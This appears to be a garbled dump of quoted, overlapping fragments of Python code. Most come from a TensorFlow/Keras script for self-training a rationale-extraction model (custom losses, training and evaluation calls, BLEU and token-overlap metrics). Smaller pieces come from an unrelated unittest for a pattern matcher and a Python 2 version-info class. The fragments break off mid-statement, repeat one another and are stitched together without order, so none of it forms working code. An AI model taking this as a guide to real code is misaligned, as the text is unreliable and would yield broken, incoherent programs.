random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted", "model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model): {}", "unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices]", "task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp'", "{\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] =", "prediction data on student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp", "y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]),", "{}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0,", "#l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred):", "y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':", "shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED", "cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss", "labels {}\".format(labels)) #split X and y to train and dev with valid_split if", "X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)),", "temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f:", "temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true,", "y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss =", "y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices]", "performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch <", "= test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ ==", "#logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1,", "model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #,", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True,", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc", "Author: <NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning. This code", "axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc", "0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp", "y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev,", "y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\":", "[y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5]", "'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc =", "y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs", "dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0,", "y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_:", "restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope():", "type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss", "[y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint':", "0. max_task_acc = 0. max_best_acc = 0. val_loss = 0. if 'mtl' in", "'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]},", "X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev", "(\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif", "type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0],", "#logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False,", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0,", "else: logger.info(\"No sampling at the moment; choose all the unlabeled examples\") X_batch =", "X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices]", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':", "test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))],", "= np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run {}:", "instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info", "len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_:", "coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss +", "X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices],", "= y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:]", "in type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]])))", "np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #", "= np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0,", "= 0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. max_best_acc =", "= np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:],", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "y[train_size:] else: X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X", "as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import", "number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", ": {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1]", "verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out =", "labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx", "on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test", "[] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] =", "0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev],", "custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r']", "\"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:],", "None}) elif 'joint_neg' in type_: rat_loss = None if 'focal' in type_: rat_loss", "#, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return", "X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length))", "X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc =", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob)", "{}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc", "(\"Best Test task acc for run {} with total loss : {}\".format(counter, task_acc))", "X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices],", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg", "X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal'", "tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p))", "tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn)))", "test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set", "axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc =", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0))", "len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0]", "[y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc =", "= X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if", "with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0]", "\"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha", "= test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in", "rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher", "run {} with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc", "axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter, test_pred))", "y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else:", "#y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred,", "if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model", "f) model_student = None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop", "valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\":", "that are not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]),", "in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the", "\".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3", "task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro')))" ]
[ "unittest from . import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', ''))", ". import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a'))", "import unittest from . import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.',", "PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.', 'ab')) self.assertTrue(pat.match('a', 'a'))", "class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.', 'ab')) self.assertTrue(pat.match('a',", "import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.',", "pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*', 'a')) self.assertTrue(pat.match('a.', 'ab'))", "from . import pat class PatTestCase(unittest.TestCase): def test_pat(self): self.assertTrue(pat.match('a*', '')) self.assertFalse(pat.match('.', '')) self.assertTrue(pat.match('ab*'," ]
[ "def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\"", "\\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s", "Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage:", "__init__(self, program, version, date, author): self.program = program self.version = version self.date =", "date, author): self.program = program self.version = version self.date = date self.author =", "\"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v", "/usr/bin/env python #_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program =", "self.version = version self.date = date self.author = author #打印版本信息 def info(self): print", "self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息 -h 打印帮助信息 \"\"\"%(self.program)", "\"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date,", "Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def", "= version self.date = date self.author = author #打印版本信息 def info(self): print \"\"\"", "%(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息", "\\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\"", "Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self): print", "def __init__(self, program, version, date, author): self.program = program self.version = version self.date", "version, date, author): self.program = program self.version = version self.date = date self.author", "= date self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version:", "#打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m", "date self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m", "VersionInfo: def __init__(self, program, version, date, author): self.program = program self.version = version", "self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息 -h 打印帮助信息", "class VersionInfo: def __init__(self, program, version, date, author): self.program = program self.version =", "program self.version = version self.date = date self.author = author #打印版本信息 def info(self):", "self.program = program self.version = version self.date = date self.author = author #打印版本信息", "= program self.version = version self.date = date self.author = author #打印版本信息 def", "author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author:", "self.date = date self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m", "program, version, date, author): self.program = program self.version = version self.date = date", "Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author)", "self.author = author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date:", "self.version, self.date, self.author) #打印帮助信息 def usage(self): print \"\"\" Usage: %s -v 打印版本信息 -h", "python #_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program = program", "\\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息 def usage(self):", "#_*_encoding:utf-8_*_ class VersionInfo: def __init__(self, program, version, date, author): self.program = program self.version", "info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program,", "version self.date = date self.author = author #打印版本信息 def info(self): print \"\"\" Name:", "print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version,", "= author #打印版本信息 def info(self): print \"\"\" Name: \\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m", "author): self.program = program self.version = version self.date = date self.author = author", "\\033[33;2m%s\\033[0m Version: \\033[33;2m%s\\033[0m Date: \\033[33;2m%s\\033[0m Author: \\033[33;2m%s\\033[0m \"\"\" %(self.program, self.version, self.date, self.author) #打印帮助信息", "#! /usr/bin/env python #_*_encoding:utf-8_*_ class VersionInfo: def 